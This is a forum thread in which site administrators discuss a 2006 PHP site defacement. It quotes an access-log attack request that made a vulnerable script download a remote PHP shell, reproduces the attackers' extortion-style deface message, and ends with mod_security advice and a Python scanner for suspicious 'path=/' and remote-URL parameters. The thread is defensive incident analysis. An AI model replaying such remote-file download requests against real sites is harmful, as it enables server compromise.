WARNING: Downloadable Shell Exploit

jackie46

Jul 25, 2005
One of our user websites was hacked and defaced even with the latest mod_security rules in place. Seems like there is a new way to download PHP shell scripts to a user's directory and then execute them.

195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

Seems like this command could be executed on anyone's website, which would lead to a site or entire server compromise.

We need a mod_security rule for this one.

They also download a script called z12sh.php, which was the actual shell script executed to hack the site. Needless to say, I ran this script and was horrified at all the information it showed me about my server, not to mention that the disabled functions in php.ini (e.g. php_shell, dl, passthru, etc.) did nothing to stop the execution of the script.

V.I.P HACKER DEFACE

-{Z12-HACKER-GROUP-IS-V.I.P. TEAM}-

This SITE HACKED BY

Mr. Gh0ster

English DEFACE VERSION

Because of numerous unsecurity positions of your site has been made DEFACE.

Safety this the most important on the Internet.

You can have for small money ours security support.

For this purpose write the letter on our E-mail.

On a regular basis visit ours private a site on the Internet!

[email protected]

Russian version of the DEFACE!!!

Because of numerous security holes in your site, its DEFACE has been done!

Security is the most important thing on the Internet.

For a small amount of money YOU can get our HACKER 100% security support.

To do so, write a letter to our e-mail.

Regularly visit our private site on the Internet! EVERYTHING IS THERE =)



(C) Z12 HACKER GROUP, 2006

jamesbond

Oct 9, 2002
"GET /rapidpro51.php?link=http://www.megaupload.com/ru/?d=D6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=/home/stitadd4/public_html/images/dvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

Is this site running a custom made script? If not, what software is this site running on?

The 'hackers' included their url using the link variable (see link=http://...), which means allow_url_fopen is not disabled on your server or that account.

Blocking link=http through mod_security is not an option here, I think, because that might break their script (just a guess, since I don't know what it's supposed to do).

Blocking megaupload.com or filenames through mod_security is pointless, since they can place their scripts on thousands of locations and name them whatever they want to name them.

You could try blocking requests for "path=/", don't think that will cause false positives.

It's nearly impossible to write mod_security rules for these types of attacks without generating false positives, especially with custom-made scripts. If the script is exploitable then it should be fixed ASAP.
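As an added example (not code from either poster), here is a small log scanner that applies the two tests discussed in this thread to Apache access-log lines: it percent-decodes every query-string value and flags ones that are an absolute server path (the "path=/" pattern) or a remote URL (the "link=http://" pattern that depends on allow_url_fopen). The log line from the thread is used as sample input alongside two constructed lines; the log format regex assumes the vhost-prefixed combined format shown above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Access-log line as quoted in the thread: client, vhost, ident, [timestamp],
# "METHOD target PROTO", status ... (trailing referer/agent fields are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def suspicious_params(request_target):
    """Return (param, value, reason) for every decoded query value that is an
    absolute filesystem path or a remote URL. Matching happens after
    percent-decoding, so %2F-encoded slashes are caught as well."""
    hits = []
    for key, val in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        if val.startswith("/"):
            hits.append((key, val, "absolute filesystem path"))
        elif re.match(r"(?i)^(https?|ftp)://", val):
            hits.append((key, val, "remote URL"))
    return hits

def scan_log(lines):
    """One finding per request whose query string carries a suspicious value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "script": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "hits": hits,
            })
    return findings

# Constructed sample: the request from the thread plus two made-up lines
# (one benign, one passing only a remote URL).
SAMPLE_LOG = [
    '195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0" "hotlog=1"',
    '10.0.0.5 www.site.com - [04/Apr/2006:12:17:01 -0400] "GET /index.php?page=news HTTP/1.1" 200 4021 "-" "Mozilla/4.0" "-"',
    '10.0.0.9 www.site.com - [04/Apr/2006:12:18:44 -0400] "GET /fetch.php?url=http://example.invalid/a.txt HTTP/1.1" 200 310 "-" "Mozilla/4.0" "-"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["script"], f["status"], f["hits"])
```

Run it over a real access_log (one line per list element) to get a quick list of which scripts accepted a server path or remote URL, and with what status code, before deciding whether a mod_security rule on "path=/" is worth the false-positive risk on that site.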